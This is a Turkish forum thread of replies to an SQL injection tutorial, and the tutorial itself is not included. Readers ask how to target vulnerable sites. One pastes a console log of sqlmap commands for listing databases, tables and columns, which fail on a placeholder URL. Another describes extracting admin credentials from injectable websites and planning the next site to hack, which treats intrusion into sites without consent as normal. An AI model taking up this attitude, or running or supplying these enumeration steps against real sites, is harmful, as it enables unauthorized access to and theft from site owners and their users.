// SQL Açığı En Temelden Tüm Yöntemlerine // AquieLL

coook detay var ama bana havij yeter

Vaaaay mükemmel konu .

Ellerine sağlık. peki özel bir sitede açık olup olmadıgını nasıl anlayabiliriz ?

Merhaba şimdi ben mesela sql açıklı bir site buldum bu siteyi buldugum gibi örnegin "www.örneksitemiz.com/newsDetail.php?id=12" mi yazacagım yoksa "www.örneksitemiz.com" şeklindemi ?

Veritabanını çekerken site.com/newsdetail.PHP?id=12

Yazılacak

Teşekkürler arkadaşlar

çok iyi

Abi gerçekten süper. Eline sağlık.:RpS_rolleyes:

Çok iyi teşekkürler

kardeşim harika eline sağlık. fakat en sonda ki youtube linki youtube.com'a atıyor. düzeltirsen sevinirim. teşekkürler..

Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. Alle Rechte vorbehalten.


C:\Users>cd..

C:\>kod:
Der Befehl "kod:" ist entweder falsch geschrieben oder
konnte nicht gefunden werden.

C:\>cd..

C:\>cd sqlmap

C:\sqlmap>sqlmap.py -u sqlaçıklıurl --dbs

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
sqlmap: automatic SQL injection and database takeover tool

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:24:10

[04:24:10] [WARNING] using 'C:\Users\ferit\.sqlmap\output' as the output directory
[04:24:13] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (Issue 1602: windows console doesn't print or input Unicode - Python tracker). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[04:24:13] [CRITICAL] host 'sqla?ikliurl' does not exist

[*] shutting down at 04:24:13


C:\sqlmap>y
Der Befehl "y" ist entweder falsch geschrieben oder
konnte nicht gefunden werden.

C:\sqlmap>sqlmap.py -u sqlacikliurl veritabaniadi --tables

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
sqlmap: automatic SQL injection and database takeover tool

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:25:11

[04:25:13] [CRITICAL] host 'sqlacikliurl' does not exist

[*] shutting down at 04:25:13


C:\sqlmap>sqlmap.py -u sqlacikliurl -D veritabani adi -T tablo adi --columns

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
sqlmap: automatic SQL injection and database takeover tool

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:25:52

[04:25:54] [CRITICAL] host 'sqlacikliurl' does not exist

[*] shutting down at 04:25:54

böyle bir hata ile karsilasiyorum acaba yardimci olabilme ihtimalin varmi mümkünse özel mejas yoluyla

Tebrik ediyorum anlatımın için çok detaylı gerçekten

Teşekkürler Hocam

eline sağlık dostum

Çok açıklayıcı olmuş sağol.

Eline saglık :d

Bende herşey tamam.

SQL açıklı sitemi buluyorum, database, tables diye diye sitenin admin giriş ve şifrelerini ele geçiriyorum, admin panelinide buluyorum, ama admin panelinden şifreleri felan girdiğimde yanlış diyor. Kafayı yiyeceğim neredeyse aynı sorunu ikinci hackleyeceğim sitede de yaşıyorum. Şifre öyle MD5 kodlu felanda değil normal sözlükten bir kelime işte.